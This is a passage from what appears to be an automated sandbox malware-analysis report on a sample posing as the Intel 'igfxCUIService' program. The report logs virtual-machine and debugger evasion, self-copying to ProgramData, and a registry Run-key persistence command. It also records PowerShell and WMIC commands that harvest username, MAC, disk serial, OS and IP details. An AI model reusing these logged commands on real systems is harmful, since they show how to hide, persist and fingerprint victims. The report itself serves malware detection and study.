Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SystemData\igfxCUIService.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SystemData\igfxCUIService.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
Source: C:\Windows\SysWOW64\getmac.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\SysWOW64\getmac.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Windows\SysWOW64\getmac.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : ASSOCIATORS OF {Win32_NetworkAdapter.DeviceID=&quot;1&quot;} WHERE ResultClass=Win32_NetworkAdapterConfiguration
Source: C:\Windows\SysWOW64\getmac.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapterSetting where Element=&quot;Win32_NetworkAdapter.DeviceID=\&quot;1\&quot;&quot;
Source: C:\Windows\SysWOW64\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT IPAddress FROM Win32_NetworkAdapterConfiguration WHERE IPEnabled = True
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5788Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6120Thread sleep time: -922337203685477s >= -30000s
Source: C:\ProgramData\SystemData\igfxCUIService.exe TID: 5580Thread sleep time: -34365s >= -30000s
Source: C:\ProgramData\SystemData\igfxCUIService.exe TID: 5580Thread sleep time: -32272s >= -30000s
Source: C:\ProgramData\SystemData\igfxCUIService.exe TID: 5580Thread sleep time: -33137s >= -30000s
Source: C:\ProgramData\SystemData\igfxCUIService.exe TID: 5580Thread sleep time: -34610s >= -30000s
Source: C:\ProgramData\SystemData\igfxCUIService.exe TID: 5580Thread sleep time: -33984s >= -30000s
Source: C:\ProgramData\SystemData\igfxCUIService.exe TID: 5580Thread sleep time: -31561s >= -30000s
Source: C:\ProgramData\SystemData\igfxCUIService.exe TID: 5580Thread sleep time: -34548s >= -30000s
Source: C:\ProgramData\SystemData\igfxCUIService.exe TID: 1440Thread sleep time: -510000s >= -30000s
Source: C:\ProgramData\SystemData\igfxCUIService.exe TID: 5580Thread sleep time: -34573s >= -30000s
Source: C:\ProgramData\SystemData\igfxCUIService.exe TID: 5580Thread sleep time: -30562s >= -30000s
Source: C:\ProgramData\SystemData\igfxCUIService.exe TID: 5580Thread sleep time: -32258s >= -30000s
Source: C:\ProgramData\SystemData\igfxCUIService.exe TID: 5580Thread sleep time: -34400s >= -30000s
Source: C:\ProgramData\SystemData\igfxCUIService.exe TID: 5580Thread sleep time: -34267s >= -30000s
Source: C:\ProgramData\SystemData\igfxCUIService.exe TID: 5580Thread sleep time: -32795s >= -30000s
Source: C:\ProgramData\SystemData\igfxCUIService.exe TID: 5580Thread sleep time: -33723s >= -30000s
Source: C:\ProgramData\SystemData\igfxCUIService.exe TID: 5580Thread sleep time: -30077s >= -30000s
Source: C:\ProgramData\SystemData\igfxCUIService.exe TID: 5580Thread sleep time: -31852s >= -30000s
Source: C:\ProgramData\SystemData\igfxCUIService.exe TID: 5580Thread sleep time: -30644s >= -30000s
Source: C:\ProgramData\SystemData\igfxCUIService.exe TID: 5580Thread sleep time: -31359s >= -30000s
Source: C:\ProgramData\SystemData\igfxCUIService.exe TID: 5580Thread sleep time: -31944s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6244Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5044Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2944Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5196Thread sleep time: -922337203685477s >= -30000s
Source: C:\ProgramData\SystemData\igfxCUIService.exe TID: 2740Thread sleep time: -32623s >= -30000s
Source: C:\ProgramData\SystemData\igfxCUIService.exe TID: 6676Thread sleep time: -210000s >= -30000s
Source: C:\ProgramData\SystemData\igfxCUIService.exe TID: 2740Thread sleep time: -32226s >= -30000s
Source: C:\ProgramData\SystemData\igfxCUIService.exe TID: 2740Thread sleep time: -33946s >= -30000s
Source: C:\ProgramData\SystemData\igfxCUIService.exe TID: 7040Thread sleep time: -30000s >= -30000s
Source: C:\ProgramData\SystemData\igfxCUIService.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\ProgramData\SystemData\igfxCUIService.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\ProgramData\SystemData\igfxCUIService.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1710
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4020
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1882
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1704
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2792
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1495
Source: C:\Users\user\Desktop\IGFXCUISERVICE.exeAPI coverage: 8.1 %
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAPI coverage: 1.7 %
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
Source: C:\ProgramData\SystemData\igfxCUIService.exeCode function: 5_2_002CB17F FindFirstFileExW,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\ProgramData\SystemData\igfxCUIService.exeThread delayed: delay time: 34365
Source: C:\ProgramData\SystemData\igfxCUIService.exeThread delayed: delay time: 32272
Source: C:\ProgramData\SystemData\igfxCUIService.exeThread delayed: delay time: 33137
Source: C:\ProgramData\SystemData\igfxCUIService.exeThread delayed: delay time: 34610
Source: C:\ProgramData\SystemData\igfxCUIService.exeThread delayed: delay time: 33984
Source: C:\ProgramData\SystemData\igfxCUIService.exeThread delayed: delay time: 31561
Source: C:\ProgramData\SystemData\igfxCUIService.exeThread delayed: delay time: 34548
Source: C:\ProgramData\SystemData\igfxCUIService.exeThread delayed: delay time: 34573
Source: C:\ProgramData\SystemData\igfxCUIService.exeThread delayed: delay time: 30562
Source: C:\ProgramData\SystemData\igfxCUIService.exeThread delayed: delay time: 32258
Source: C:\ProgramData\SystemData\igfxCUIService.exeThread delayed: delay time: 34400
Source: C:\ProgramData\SystemData\igfxCUIService.exeThread delayed: delay time: 34267
Source: C:\ProgramData\SystemData\igfxCUIService.exeThread delayed: delay time: 32795
Source: C:\ProgramData\SystemData\igfxCUIService.exeThread delayed: delay time: 33723
Source: C:\ProgramData\SystemData\igfxCUIService.exeThread delayed: delay time: 30077
Source: C:\ProgramData\SystemData\igfxCUIService.exeThread delayed: delay time: 31852
Source: C:\ProgramData\SystemData\igfxCUIService.exeThread delayed: delay time: 30644
Source: C:\ProgramData\SystemData\igfxCUIService.exeThread delayed: delay time: 31359
Source: C:\ProgramData\SystemData\igfxCUIService.exeThread delayed: delay time: 31944
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\ProgramData\SystemData\igfxCUIService.exeThread delayed: delay time: 32623
Source: C:\ProgramData\SystemData\igfxCUIService.exeThread delayed: delay time: 32226
Source: C:\ProgramData\SystemData\igfxCUIService.exeThread delayed: delay time: 33946
Source: igfxCUIService.exe, 00000020.00000003.909658856.00000000014B8000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.934965580.00000000014B8000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.936888635.00000000014B8000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.926697052.00000000014B8000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.932777879.00000000014B8000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.914951380.00000000014B8000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.919370011.00000000014B8000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.924907185.00000000014B8000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.913311525.00000000014B8000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000002.956443217.00000000014B8000.00000004.00000020.sdmp, igfxCUIService.exe, 00000020.00000003.929400111.00000000014B8000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWg|&
Source: powershell.exe, 00000003.00000003.717158709.0000000004E4F000.00000004.00000001.sdmp, powershell.exe, 00000007.00000002.820363609.0000000005221000.00000004.00000001.sdmpBinary or memory string: Hyper-V
Source: getmac.exe, 00000009.00000002.803585343.0000000000A6D000.00000004.00000001.sdmp, getmac.exe, 00000009.00000003.802570744.0000000000A6A000.00000004.00000001.sdmp, getmac.exe, 00000009.00000003.802525219.0000000000A64000.00000004.00000001.sdmpBinary or memory string: __PARAMETERSSYSTEM\CurrentControlSet\Services\Hyper-V\LinkageExport
Source: igfxCUIService.exe, 00000005.00000003.878492496.0000000001203000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.909658856.00000000014B8000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.934965580.00000000014B8000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.936888635.00000000014B8000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.926697052.00000000014B8000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.932777879.00000000014B8000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.914951380.00000000014B8000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.919370011.00000000014B8000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.924907185.00000000014B8000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.913311525.00000000014B8000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000002.956443217.00000000014B8000.00000004.00000020.sdmp, igfxCUIService.exe, 00000020.00000003.929400111.00000000014B8000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
Source: getmac.exe, 00000009.00000002.803585343.0000000000A6D000.00000004.00000001.sdmp, getmac.exe, 00000009.00000003.802570744.0000000000A6A000.00000004.00000001.sdmp, getmac.exe, 00000009.00000003.802525219.0000000000A64000.00000004.00000001.sdmpBinary or memory string: SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage
Source: igfxCUIService.exe, 00000020.00000002.956196667.000000000146D000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW`
Source: powershell.exe, 00000003.00000002.729878512.0000000004843000.00000004.00000001.sdmp, powershell.exe, 00000003.00000003.717158709.0000000004E4F000.00000004.00000001.sdmp, powershell.exe, 00000007.00000002.819829788.0000000004ED3000.00000004.00000001.sdmp, powershell.exe, 00000007.00000002.820363609.0000000005221000.00000004.00000001.sdmpBinary or memory string: l:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
Source: C:\Users\user\Desktop\IGFXCUISERVICE.exeCode function: 1_2_012D1195 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\Desktop\IGFXCUISERVICE.exeCode function: 1_2_012A40F0 GetProcessHeap,__Init_thread_footer,__Init_thread_footer,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Users\user\Desktop\IGFXCUISERVICE.exeCode function: 1_2_012DAF0E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\IGFXCUISERVICE.exeCode function: 1_2_012D2B5D mov eax, dword ptr fs:[00000030h]
Source: C:\ProgramData\SystemData\igfxCUIService.exeCode function: 5_2_002C2B5D mov eax, dword ptr fs:[00000030h]
Source: C:\ProgramData\SystemData\igfxCUIService.exeCode function: 5_2_002CAF0E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\IGFXCUISERVICE.exeCode function: 1_2_012D1195 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\Desktop\IGFXCUISERVICE.exeCode function: 1_2_012C46CB SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\ProgramData\SystemData\igfxCUIService.exeCode function: 5_2_002B4F68 SetUnhandledExceptionFilter,
Source: C:\ProgramData\SystemData\igfxCUIService.exeCode function: 5_2_002C1195 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\ProgramData\SystemData\igfxCUIService.exeCode function: 5_2_002B46CB SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\ProgramData\SystemData\igfxCUIService.exeCode function: 5_2_002B4DD5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

HIPS / PFW / Operating System Protection Evasion:

barindex
Encrypted powershell cmdline option foundShow sources
Source: C:\ProgramData\SystemData\igfxCUIService.exeProcess created: Base64 decoded [B> j^6jm&Z"}+"qfyRzmb'rb}#6i,jzjlm
Source: C:\ProgramData\SystemData\igfxCUIService.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $env:username | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\tempu.txt'
Source: C:\ProgramData\SystemData\igfxCUIService.exeProcess created: Base64 decoded [B> j^6jm&Z"}+"qfyRzmb'rb}#6i,jzjlm
Source: C:\ProgramData\SystemData\igfxCUIService.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $env:username | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\tempu.txt'
Source: C:\ProgramData\SystemData\igfxCUIService.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" getmac | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps1.txt' ; wmic path win32_physicalmedia get SerialNumber | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps2.txt'
Source: C:\ProgramData\SystemData\igfxCUIService.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" getmac | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps1.txt' ; wmic path win32_physicalmedia get SerialNumber | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps2.txt'
Source: C:\Users\user\Desktop\IGFXCUISERVICE.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" copy 'C:\Users\user\Desktop\IGFXCUISERVICE.exe' 'C:\ProgramData\SystemData\igfxCUIService.exe'
Source: C:\Users\user\Desktop\IGFXCUISERVICE.exeProcess created: C:\ProgramData\SystemData\igfxCUIService.exe "C:\ProgramData\SystemData\igfxCUIService.exe"
Source: C:\ProgramData\SystemData\igfxCUIService.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" getmac | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps1.txt' ; wmic path win32_physicalmedia get SerialNumber | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps2.txt'
Source: C:\ProgramData\SystemData\igfxCUIService.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $env:username | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\tempu.txt'
Source: C:\ProgramData\SystemData\igfxCUIService.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c wmic OS get Caption, CSDVersion, OSArchitecture, Version / value > "C:\ProgramData\SystemData\tempo1.txt" && type "C:\ProgramData\SystemData\tempo1.txt" > "C:\ProgramData\SystemData\tempo2.txt
Source: C:\ProgramData\SystemData\igfxCUIService.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c wmic nicconfig where 'IPEnabled = True' get ipaddress > "C:\ProgramData\SystemData\tempi1.txt" && type "C:\ProgramData\SystemData\tempi1.txt" > "C:\ProgramData\SystemData\tempi2.txt
Source: C:\ProgramData\SystemData\igfxCUIService.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V igfxCUIService /t REG_SZ /D "C:\ProgramData\SystemData\igfxCUIService.exe" /F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\getmac.exe C:\Windows\system32\getmac.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe "C:\Windows\System32\Wbem\WMIC.exe" path win32_physicalmedia get SerialNumber
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic OS get Caption, CSDVersion, OSArchitecture, Version / value
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic nicconfig where 'IPEnabled = True' get ipaddress
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V igfxCUIService /t REG_SZ /D "C:\ProgramData\SystemData\igfxCUIService.exe" /F
Source: C:\ProgramData\SystemData\igfxCUIService.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V igfxCUIService /t REG_SZ /D "C:\ProgramData\SystemData\igfxCUIService.exe" /F
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V igfxCUIService /t REG_SZ /D "C:\ProgramData\SystemData\igfxCUIService.exe" /F
Source: C:\ProgramData\SystemData\igfxCUIService.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V igfxCUIService /t REG_SZ /D "C:\ProgramData\SystemData\igfxCUIService.exe" /F
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V igfxCUIService /t REG_SZ /D "C:\ProgramData\SystemData\igfxCUIService.exe" /F
Source: igfxCUIService.exe, 00000005.00000002.956989647.00000000018B0000.00000002.00020000.sdmp, igfxCUIService.exe, 00000020.00000002.956990102.0000000001A50000.00000002.00020000.sdmp, igfxCUIService.exe, 00000024.00000002.956939502.00000000019A0000.00000002.00020000.sdmpBinary or memory string: Program Manager
Source: igfxCUIService.exe, 00000005.00000002.956989647.00000000018B0000.00000002.00020000.sdmp, igfxCUIService.exe, 00000020.00000002.956990102.0000000001A50000.00000002.00020000.sdmp, igfxCUIService.exe, 00000024.00000002.956939502.00000000019A0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
Source: igfxCUIService.exe, 00000005.00000002.956989647.00000000018B0000.00000002.00020000.sdmp, igfxCUIService.exe, 00000020.00000002.956990102.0000000001A50000.00000002.00020000.sdmp, igfxCUIService.exe, 00000024.00000002.956939502.00000000019A0000.00000002.00020000.sdmpBinary or memory string: Progman
Source: igfxCUIService.exe, 00000005.00000002.956989647.00000000018B0000.00000002.00020000.sdmp, igfxCUIService.exe, 00000020.00000002.956990102.0000000001A50000.00000002.00020000.sdmp, igfxCUIService.exe, 00000024.00000002.956939502.00000000019A0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
